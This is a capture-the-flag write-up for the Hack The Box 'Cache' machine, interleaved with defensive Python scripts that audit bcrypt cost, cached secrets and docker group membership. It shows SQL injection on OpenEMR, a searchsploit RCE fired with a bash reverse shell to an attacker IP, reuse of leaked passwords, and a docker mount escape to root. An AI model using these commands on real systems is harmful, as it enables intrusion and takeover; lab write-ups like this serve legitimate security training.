HTB Cache Write-Up

User Flag

Result of nmap scan:

Nmap Result
PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
| 256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_ 256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Heading to the IP address in the browser reveals a website that looks static and old. The login page, however, references an unusually named script, /jquery/functionality.js. Opening it reveals that the only working credentials for the login form are ash:H@v3_fun. The page behind it is under construction, with a nice picture of Ace from One Piece.
Further exploration of the Author page shows:

ASH is a Security Researcher (Threat Research Labs), Security Engineer. Hacker, Penetration Tester and Security blogger. He is Editor-in-Chief, Author & Creator of Cache. Check out his other projects like Cache:

HMS (Hospital Management System)

So if we are exploring cache.htb and it says there is an HMS that is like Cache, could there be an hms.htb?!
Add that to the /etc/hosts file and we get a login page. It appears to be a CMS called OpenEMR. When facing a CMS, I don't go straight for gobuster, since its structure can be found directly where the CMS is published (such as GitHub), and you can even find its listed vulnerabilities.

Found OpenEMR on GitHub, but robots.txt does not mention the version. There is an admin.php in the root folder, and http://hms.htb/admin.php reveals that the version used is 5.0.1 (3). Still on GitHub, switch to the tag matching that version in order to see the source code that is deployed at HMS.

Now for vulnerability hunting: searchsploit reveals an RCE for our version, but it requires authentication. A Google search ended with a PDF containing a ton of vulnerabilities. Follow the instructions to perform a SQL injection through the catid GET parameter of /portal/find_appt_popup_user.php. To speed up exfiltration of the users, you will find the database schema in the repo; the target table is called users_secure.
Successful SQLMap exploitation gives the credentials openemr_admin:$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. This being a bcrypt hash, pass it to john or hashcat and it comes out as xxxxxx (what a dumb password for an admin, lol).
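The hash recovered above carries its bcrypt work factor in the `$2a$05$` prefix. As an added example (my own illustration, not code from the write-up or from OpenEMR), the following parser splits a bcrypt string into its fields and audits a list of user/hash rows against a minimum cost; the floor of 10 and the helper names are assumptions for the illustration, and a cost of 05 means only 2^5 = 32 rounds.

```python
import re

# Modular-crypt bcrypt layout: $<variant>$<cost>$<22-char salt><31-char digest>
# The digest group is left open-ended so that a truncated or mis-copied hash
# is still parsed and can be reported as malformed rather than silently skipped.
_BCRYPT_RE = re.compile(
    r"^\$(?P<variant>2[abxy]?)\$(?P<cost>\d{2})\$"
    r"(?P<salt>[./A-Za-z0-9]{22})(?P<digest>[./A-Za-z0-9]+)$"
)

# Assumed policy floor for this illustration (not an OpenEMR setting).
MIN_COST = 10


def parse_bcrypt(hash_str):
    """Split a bcrypt hash into its fields; return None if it is not bcrypt."""
    m = _BCRYPT_RE.match(hash_str)
    if not m:
        return None
    cost = int(m.group("cost"))
    return {
        "variant": m.group("variant"),
        "cost": cost,
        "iterations": 2 ** cost,   # bcrypt runs 2^cost key-setup rounds
        "salt": m.group("salt"),
        "digest": m.group("digest"),
    }


def audit_hashes(rows, min_cost=MIN_COST):
    """rows: iterable of (username, hash). Returns a list of finding strings."""
    findings = []
    for user, h in rows:
        info = parse_bcrypt(h)
        if info is None:
            findings.append(f"{user}: not a bcrypt hash (unsupported or legacy format)")
            continue
        if len(info["digest"]) != 31:
            findings.append(
                f"{user}: malformed bcrypt digest length {len(info['digest'])} (expected 31)"
            )
        if info["cost"] < min_cost:
            findings.append(
                f"{user}: bcrypt cost {info['cost']:02d} "
                f"({info['iterations']} rounds) is below the floor of {min_cost}"
            )
    return findings


if __name__ == "__main__":
    # Row taken from the write-up above; the hash is used only as parser input.
    sample = [("openemr_admin",
               "$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B")]
    for finding in audit_hashes(sample):
        print(finding)
```

Run against a dump of users_secure (or any table of bcrypt hashes), this reports every account whose hash can be brute-forced at a much higher rate than policy intends; raising the cost only takes effect when each user's password is next rehashed, so a finding here is also a prompt to force a reset.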

Now we are authenticated, time to use the exploit we found with searchsploit.

$ searchsploit -m php/webapps/45161.py
$ mv 45161.py openemr_rce.py
# Listen to a port with netcat in another shell
$ python openemr_rce.py http://hms.htb -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/<tun0_ip>/<port> 0>&1'

And you have a shell!

The user flag is owned and readable only by ash, but we do have a password for ash, found in the Cache JS script. Let's try that:

$ python3 -c 'import pty; pty.spawn("/bin/bash")' # Spawn TTY shell
$ su ash
Password: H@v3_fun
$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash)

Voilà!

Root Flag

Ash can't sudo on the box, so we used the famous linpeas script to check for things we could exploit.
In the process list, I spotted:

memcache  1098  0.0  0.1 425792  4052 ?        Ssl  13:30   0:00 /usr/bin/memcached -m 64 -p 11211 -u memcache -l 127.0.0.1 -P /var/run/memcached/memcached.pid

Memcached is listening on 11211, so let's see what information it can give us.

ash@cache:~$ telnet localhost 11211
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
stats items
.
.
.
stats cachedump 1 100
ITEM link [21 b; 0 s]
ITEM user [5 b; 0 s]
ITEM passwd [9 b; 0 s]
ITEM file [7 b; 0 s]
ITEM account [9 b; 0 s]
END
get passwd
VALUE passwd 0 9
0n3_p1ec3
END

And we got 0n3_p1ec3! That is sure to be the password of user luffy (I'm a BIG fan of One Piece, by the way).
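The memcached session above works because the ASCII protocol has no authentication: binding to 127.0.0.1 keeps the network out, but every local account can still read the whole cache. As an added example (my own code, not from the write-up or from memcached), the following parses the two response formats seen in that session, `ITEM <key> [<bytes> b; <exptime> s]` and `VALUE <key> <flags> <bytes>`, and flags cached keys whose names suggest a credential. The sample responses are reconstructed from the transcript above, and the sensitive-name pattern is an assumption you would tune for your own application.

```python
import re

# Response line formats from memcached's ASCII protocol:
#   ITEM <key> [<bytes> b; <exptime> s]    from "stats cachedump <slab> <limit>"
#                                          (exptime 0 means the item never expires)
#   VALUE <key> <flags> <bytes>\r\n<data>  from "get <key>"
_ITEM_RE = re.compile(r"^ITEM (\S+) \[(\d+) b; (\d+) s\]$")
_VALUE_RE = re.compile(r"^VALUE (\S+) (\d+) (\d+)$")

# Key names that should never map to a plaintext secret in a cache (assumed list).
SENSITIVE_KEY_RE = re.compile(r"(pass|pwd|secret|token|cred|account)", re.IGNORECASE)

# Constructed from the transcript in the write-up above.
SAMPLE_CACHEDUMP = """ITEM link [21 b; 0 s]
ITEM user [5 b; 0 s]
ITEM passwd [9 b; 0 s]
ITEM file [7 b; 0 s]
ITEM account [9 b; 0 s]
END"""

SAMPLE_GET = """VALUE passwd 0 9
0n3_p1ec3
END"""


def parse_cachedump(text):
    """Return [(key, size_bytes, exptime)] from a 'stats cachedump' response."""
    items = []
    for line in text.splitlines():
        m = _ITEM_RE.match(line.strip())
        if m:
            items.append((m.group(1), int(m.group(2)), int(m.group(3))))
    return items


def parse_get(text):
    """Return {key: value} from a 'get' response, honouring the byte count."""
    lines = text.splitlines()
    values = {}
    i = 0
    while i < len(lines):
        m = _VALUE_RE.match(lines[i].strip())
        if m:
            key, nbytes = m.group(1), int(m.group(3))
            data = lines[i + 1] if i + 1 < len(lines) else ""
            values[key] = data[:nbytes]   # the data line is exactly <bytes> long
            i += 2
        else:
            i += 1
    return values


def audit_cache(items):
    """Flag keys whose name suggests a credential, noting those with no expiry."""
    findings = []
    for key, size, exptime in items:
        if SENSITIVE_KEY_RE.search(key):
            note = f"key '{key}' ({size} bytes) looks like a credential"
            if exptime == 0:
                note += " and never expires"
            findings.append(note)
    return findings


if __name__ == "__main__":
    items = parse_cachedump(SAMPLE_CACHEDUMP)
    for finding in audit_cache(items):
        print(finding)
    print(parse_get(SAMPLE_GET))
```

The fix on the application side is not a stronger cache but a different design: a cache entry is world-readable to every process on the host, so passwords and account identifiers belong in a protected store, and anything that must be cached should carry an expiry. Running the audit against a real dump of your own memcached (collected by the operator, over the same `stats cachedump` and `get` commands) tells you whether the application is leaking secrets that way.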

Now that lateral movement is done and luffy can't sudo either, let's use linpeas again. The first outputs reveal that luffy is a member of the docker group.

User & Groups: uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)

This means we can run docker commands, such as deploying containers. The privilege escalation became clear: deploy an interactive container and mount the host filesystem as a volume inside it. Since we will be root in the container, we will be root over the mounted volume, which is the box itself. Let's first check whether there is an image on the box we can use, because if not, we would have to set up a docker registry on our machine, host a useful image there, and make the box pull it.

luffy@cache:~$ docker image ls
REPOSITORY TAG IMAGE ID CREATED SIZE
ubuntu latest 2ca708c1c9cc 8 months ago 64.2MB
luffy@cache:~$ docker run --rm -it -v /:/mnt ubuntu chroot /mnt
#

Congratulations, you just rooted the box.
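The root step above relies on nothing more than docker group membership, which is why that group must be treated as root-equivalent in account reviews. As an added example (my own code, not from the write-up or from linpeas), the following parses /etc/group and the `uid=... groups=...` line linpeas printed, and reports accounts that belong to groups whose membership amounts to root; the sample group file is constructed, and the list of watched groups is an assumption to adjust for your hosts.

```python
import re

# Groups whose membership is equivalent to root on a typical host (assumed list):
# docker and lxd can start containers with host paths mounted, as shown above;
# sudo and wheel are the usual administrative groups.
ROOT_EQUIVALENT_GROUPS = {"docker", "lxd", "sudo", "wheel"}

# Constructed sample in /etc/group format: name:password:gid:member,member
SAMPLE_GROUP_FILE = """root:x:0:
sudo:x:27:
docker:x:999:luffy
ash:x:1000:
luffy:x:1001:
"""

# Line as printed by linpeas in the write-up above.
SAMPLE_ID_LINE = ("User & Groups: uid=1001(luffy) gid=1001(luffy) "
                  "groups=1001(luffy),999(docker)")


def parse_group_file(text):
    """Parse /etc/group lines into {group_name: (gid, [members])}."""
    groups = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 4:
            continue   # skip malformed lines rather than guessing
        name, _password, gid, members = parts
        groups[name] = (int(gid), [m for m in members.split(",") if m])
    return groups


def root_equivalent_members(groups, watch=ROOT_EQUIVALENT_GROUPS):
    """Return {group: [members]} for watched groups that have any members."""
    return {g: members for g, (_gid, members) in groups.items()
            if g in watch and members}


def groups_from_id_line(line):
    """Extract group names from an id(1)-style 'groups=1001(luffy),999(docker)' field."""
    m = re.search(r"groups=(\S+)", line)
    if not m:
        return []
    return re.findall(r"\((\w+)\)", m.group(1))


def flag_id_line(line, watch=ROOT_EQUIVALENT_GROUPS):
    """Return the root-equivalent groups present in an id-style line."""
    return [g for g in groups_from_id_line(line) if g in watch]


if __name__ == "__main__":
    print(root_equivalent_members(parse_group_file(SAMPLE_GROUP_FILE)))
    print(flag_id_line(SAMPLE_ID_LINE))
```

Run over the real /etc/group of a fleet, this turns the linpeas observation into a recurring control: any non-administrative account that shows up in docker (or lxd) should either lose the membership or be documented as an administrator, because Docker's own documentation states that access to the daemon socket is equivalent to root.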